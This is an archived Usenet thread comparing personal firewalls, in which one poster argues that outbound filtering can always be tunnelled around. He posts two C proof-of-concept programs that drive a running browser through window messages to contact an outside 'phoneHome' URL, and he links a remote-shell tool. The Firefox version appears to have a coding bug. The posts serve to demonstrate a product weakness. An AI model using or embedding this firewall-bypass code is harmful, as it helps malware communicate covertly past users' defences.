Zone Alarm vs Kerio

Archived from groups: comp.security.firewalls (More info?)

Which is better and why?
--
Wattsville Blues

Gimme some sugar, baby!
25 answers Last reply
More about zone alarm kerio
  1. Archived from groups: comp.security.firewalls (More info?)

    In article <de4qvk$70m$1@nwrdmz01.dmz.ncs.ea.ibs-infra.bt.com>,
    nothing@nothing.net says...
    > Which is better and why?
    >

    It obviously depends on what your needs are and what you want...

    --
    Kerodo
  2. Archived from groups: comp.security.firewalls (More info?)

    Kerodo wrote:
    > In article <de4qvk$70m$1@nwrdmz01.dmz.ncs.ea.ibs-infra.bt.com>,
    > nothing@nothing.net says...
    >
    >>Which is better and why?
    >>
    >
    >
    > It obviously depends on what your needs are and what you want...
    >

    Obviously. I'm not a really advanced user so can you be more specific
    about what I should detail about my needs?

    --
    Wattsville Blues

    Gimme some sugar, baby!
  3. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > Which is better and why?

    Just use the Windows-Firewall.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  4. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>Which is better and why?
    >
    >
    > Just use the Windows-Firewall.
    >
    > Yours,
    > VB.

    I'm afraid that won't do, I need a firewall to control outbound connections.

    --
    Wattsville Blues

    Gimme some sugar, baby!
  5. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > >>Which is better and why?
    > > Just use the Windows-Firewall.
    > I'm afraid that won't do, I need a firewall to control outbound connections.

    Unfortunately, it's not possible to control outbound traffic reliable,
    because of tunneling.

    A simple test proofes this: http://www.dingens.org/breakout.c
    Just start an Internet Explorer, and test it for your own, your
    "Personal Firewall" activated.

    In our tests every of the tested "Personal Firewalls" failed to detect
    even such simple tunneling methods. Alexander Bernauer then wrote a
    simple remote shell with this POC, the wwwsh. And no "Personal Firewall"
    was able to detain this remote control software, as expected (you can
    download the code here: http://copton.net/vortraege/pfw/wwwsh.tar.bz2).

    Even, if the "Personal Firewall" providers will extend their efforts,
    and will try to prevent this in future releases, there are so many
    possibilities to tunnel, that this attempt cannot not succeed.

    So it's true unfortunately, that the only type of application the
    "Personal Firewalls" are able to stop communicating, are the programs,
    which admit to be controlled.

    Yes, some more harmless malware is like this, but I doubt, that this is
    what you intend to stop communicating.

    The only way to avoid unwanted software on your PC is not installing
    and executing it. If it's running, mostly it's too late.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  6. Archived from groups: comp.security.firewalls (More info?)

    In article <43074704@news.uni-ulm.de>, bumens@dingens.org says...
    > Wattsville Blues <nothing@nothing.net> wrote:
    > > >>Which is better and why?
    > > > Just use the Windows-Firewall.
    > > I'm afraid that won't do, I need a firewall to control outbound connections.
    >
    > Unfortunately, it's not possible to control outbound traffic reliable,
    > because of tunneling.
    >
    > A simple test proofes this: http://www.dingens.org/breakout.c
    > Just start an Internet Explorer, and test it for your own, your
    > "Personal Firewall" activated.
    >

    Does this apply to other browsers also, or is it just IE..

    --
    Kerodo
  7. Archived from groups: comp.security.firewalls (More info?)

    Kerodo <loopback@localhost.com> wrote:
    > > A simple test proofes this: http://www.dingens.org/breakout.c
    > > Just start an Internet Explorer, and test it for your own, your
    > > "Personal Firewall" activated.
    > Does this apply to other browsers also, or is it just IE..

    http://www.dingens.org/breakout-mozilla-firefox.c

    This works with any browser.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  8. Archived from groups: comp.security.firewalls (More info?)

    "Volker Birk" <bumens@dingens.org> wrote in message
    news:430798c7@news.uni-ulm.de...
    > Kerodo <loopback@localhost.com> wrote:
    >> > A simple test proofes this: http://www.dingens.org/breakout.c
    >> > Just start an Internet Explorer, and test it for your own, your
    >> > "Personal Firewall" activated.
    >> Does this apply to other browsers also, or is it just IE..
    >
    > http://www.dingens.org/breakout-mozilla-firefox.c
    >
    > This works with any browser.
    >
    > Yours,
    > VB.
    > --
    > "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    > deutschen Schlafzimmern passiert".
    > Harald Schmidt zum "Weltjugendtag"


    What's supposed to happen when I go to this URL ???
  9. Archived from groups: comp.security.firewalls (More info?)

    In article <430798c7@news.uni-ulm.de>, bumens@dingens.org says...
    > Kerodo <loopback@localhost.com> wrote:
    > > > A simple test proofes this: http://www.dingens.org/breakout.c
    > > > Just start an Internet Explorer, and test it for your own, your
    > > > "Personal Firewall" activated.
    > > Does this apply to other browsers also, or is it just IE..
    >
    > http://www.dingens.org/breakout-mozilla-firefox.c
    >
    > This works with any browser.
    >

    Ok, thanks, that's what I wanted to know.

    --
    Kerodo
  10. Archived from groups: comp.security.firewalls (More info?)

    Anonymous <Anonymous@nowhere.com> wrote:
    > > http://www.dingens.org/breakout-mozilla-firefox.c
    > What's supposed to happen when I go to this URL ???

    You'll see C source code for a POC, how to communicate outside in spite
    of any "Personal Firewall". This POC requires, that the browser is already
    running.

    If you believe, that this is a problem, I will post a POC, how to start
    the browser without having problems with a "Personal Firewall", too.

    First the Internet Explorer version:

    --------------------------- snip ------------------------------------------
    #include <windows.h>

    int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
    int nCmdShow)
    {
    HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
    HWND wrk, tb, cbx, cb, url;

    if (ie == NULL) {
    MessageBox(NULL, "Please open an Internet Explorer window, or"
    "I will goin' to open one myself ;-)",
    "Oooh!", MB_OK | MB_ICONEXCLAMATION);

    return 0;
    }

    wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
    tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
    cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
    cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
    url = FindWindowEx(cb, NULL, "Edit", NULL);

    SendMessage(url, WM_SETTEXT, NULL, "http://www.dingens.org/breakout.html");
    PostMessage(url, WM_SETFOCUS, 0, 0);
    PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);
    return 0;
    }
    --------------------------- snap ------------------------------------------

    and here the Mozilla Firefox version:

    --------------------------- snip ------------------------------------------
    #include <windows.h>

    const char *phoneHome = "http://www.dingens.org/breakout.html";

    int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
    int nCmdShow)
    {
    HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
    HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
    int i;

    SetForegroundWindow(wnd);

    PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

    for (i=0; i<strlen(phoneHome); i++)
    PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome, NULL);

    PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);

    return 0;
    }
    --------------------------- snap ------------------------------------------

    Believe me, this is only the simplest of hundreds of possibilities to
    do tunneling. I just tried it first, because it's so easy.

    Every "Personal Firewall" screwed up already with such simple tricks.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  11. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>Which is better and why?
    >
    >
    > Just use the Windows-Firewall.
    >
    > Yours,
    > VB.

    The Windows firewall still responds to pings. How can I stop it doing this?

    --
    Wattsville Blues

    Gimme some sugar, baby!
  12. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues wrote:
    > Volker Birk wrote:
    >
    >> Wattsville Blues <nothing@nothing.net> wrote:
    >>
    >>> Which is better and why?
    >>
    >>
    >>
    >> Just use the Windows-Firewall.
    >>
    >> Yours,
    >> VB.
    >
    >
    > The Windows firewall still responds to pings. How can I stop it doing
    > this?
    >

    Disregard.
  13. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > The Windows firewall still responds to pings. How can I stop it doing this?

    Why do you want to do this? The IP stack of Windows has no bugs with
    ICMP echo any more, so it's useless to stop it.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  14. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>The Windows firewall still responds to pings. How can I stop it doing this?
    >
    >
    > Why do you want to do this? The IP stack of Windows has no bugs with
    > ICMP echo any more, so it's useless to stop it.
    >
    > Yours,
    > VB.

    Easy tiger, I'm just a novice and you lost me there! I just like to be
    stealthed.

    Oh, and I cancelled those other messages - I'd no idea that could be
    done, so cheers!

    --
    Wattsville Blues

    Gimme some sugar, baby!
  15. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > >> Just use the Windows-Firewall.
    > > The Windows firewall still responds to pings. How can I stop it doing
    > > this?
    > Disregard.

    BTW: you could also cancel your article. Just read the documentation of
    your newsreader.

    F'up2P,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  16. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > >>The Windows firewall still responds to pings. How can I stop it doing this?
    > > Why do you want to do this? [...]
    > [...] I just like to be stealthed.

    This is impossible.

    The "stealth"-features of the "Personal Firewalls" all are based on
    misunderstanding ICMP.

    It is not possible to make a PC "invisible" in the Internet by a Software
    running on this PC if it's connected, because an host seems to be not
    there only, if a router before the host sends ICMP Destination Unreachable
    with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 /
    STD 0005, http://www.rfc-editor.org.

    Therefore i.e. portscanners have no problem to detect a PC, which is
    "stealthed" by any "Personal Firewall".

    For example, with nmap use the parameter -P0 to detect PCs, which are
    "stealthed".

    I don't know, if the providers of the "Personal Firewalls" don't
    understand the Internet Protocol family, or if they're lying to
    sell their products with non-existing "stealth"-features.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  17. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>>>The Windows firewall still responds to pings. How can I stop it doing this?
    >>>
    >>>Why do you want to do this? [...]
    >>
    >>[...] I just like to be stealthed.
    >
    >
    > This is impossible.
    >
    > The "stealth"-features of the "Personal Firewalls" all are based on
    > misunderstanding ICMP.
    >
    > It is not possible to make a PC "invisible" in the Internet by a Software
    > running on this PC if it's connected, because an host seems to be not
    > there only, if a router before the host sends ICMP Destination Unreachable
    > with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 /
    > STD 0005, http://www.rfc-editor.org.
    >
    > Therefore i.e. portscanners have no problem to detect a PC, which is
    > "stealthed" by any "Personal Firewall".
    >
    > For example, with nmap use the parameter -P0 to detect PCs, which are
    > "stealthed".
    >
    > I don't know, if the providers of the "Personal Firewalls" don't
    > understand the Internet Protocol family, or if they're lying to
    > sell their products with non-existing "stealth"-features.
    >
    > Yours,
    > VB.

    Jeus, forget I said anything.

    --
    Wattsville Blues

    Gimme some sugar, baby!
  18. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > > I don't know, if the providers of the "Personal Firewalls" don't
    > > understand the Internet Protocol family, or if they're lying to
    > > sell their products with non-existing "stealth"-features.
    > Jeus, forget I said anything.

    Sorry, I didn't want to scare away you ;-)

    I just wanted to explain, why the advertisment of the "Personal Firewall"
    providers is rank nonsense. What they're claiming, their products should
    accomplish, just is impossible.

    There is a gap between reality and advertisment here - and not only here,
    I'm sorry.

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  19. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>>I don't know, if the providers of the "Personal Firewalls" don't
    >>>understand the Internet Protocol family, or if they're lying to
    >>>sell their products with non-existing "stealth"-features.
    >>
    >>Jeus, forget I said anything.
    >
    >
    > Sorry, I didn't want to scare away you ;-)
    >
    > I just wanted to explain, why the advertisment of the "Personal Firewall"
    > providers is rank nonsense. What they're claiming, their products should
    > accomplish, just is impossible.
    >
    > There is a gap between reality and advertisment here - and not only here,
    > I'm sorry.
    >
    > Yours,
    > VB.

    You're not one of those people who thinks using AV software is a bad
    idea are you?

    --
    Wattsville Blues

    Gimme some sugar, baby!
  20. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > You're not one of those people who thinks using AV software is a bad
    > idea are you?

    No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
    the constraints they're subjected.

    Why?

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  21. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > You're not one of those people who thinks using AV software is a bad
    > idea are you?

    No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
    the constraints they're subjecting.

    Why?

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  22. Archived from groups: comp.security.firewalls (More info?)

    Volker Birk wrote:
    > Wattsville Blues <nothing@nothing.net> wrote:
    >
    >>You're not one of those people who thinks using AV software is a bad
    >>idea are you?
    >
    >
    > No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
    > the constraints they're subjecting.
    >
    > Why?
    >
    > Yours,
    > VB.

    Firewalls are one thing, but people who think than AVs are worthless are
    idiots.

    --
    Wattsville Blues

    Gimme some sugar, baby!
  23. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues <nothing@nothing.net> wrote:
    > >>You're not one of those people who thinks using AV software is a bad
    > >>idea are you?
    > > No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
    > > the constraints they're subjecting.
    > > Why?
    > Firewalls are one thing, but people who think than AVs are worthless are
    > idiots.

    Oh, then I'm lucky not being called an idiot by you ;-) Thanx! :-P

    Yours,
    VB.
    --
    "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
    deutschen Schlafzimmern passiert".
    Harald Schmidt zum "Weltjugendtag"
  24. Archived from groups: comp.security.firewalls (More info?)

    Wattsville Blues wrote:

    > Which is better and why?

    That's like asking:

    "Deux Chevaux vs. Trebant.

    Which is better and why?"

    Get a hardware firewall.
  25. Archived from groups: comp.security.firewalls (More info?)

    I am a Sock Puppet wrote:
    > Wattsville Blues wrote:
    >
    >> Which is better and why?
    >
    >
    > That's like asking:
    >
    > "Deux Chevaux vs. Trebant.
    >
    > Which is better and why?"
    >
    > Get a hardware firewall.
    >

    I already have one, I need one to control outbound access.

    --
    Wattsville Blues

    Gimme some sugar, baby!
Ask a new question

Read More

Firewalls Security Networking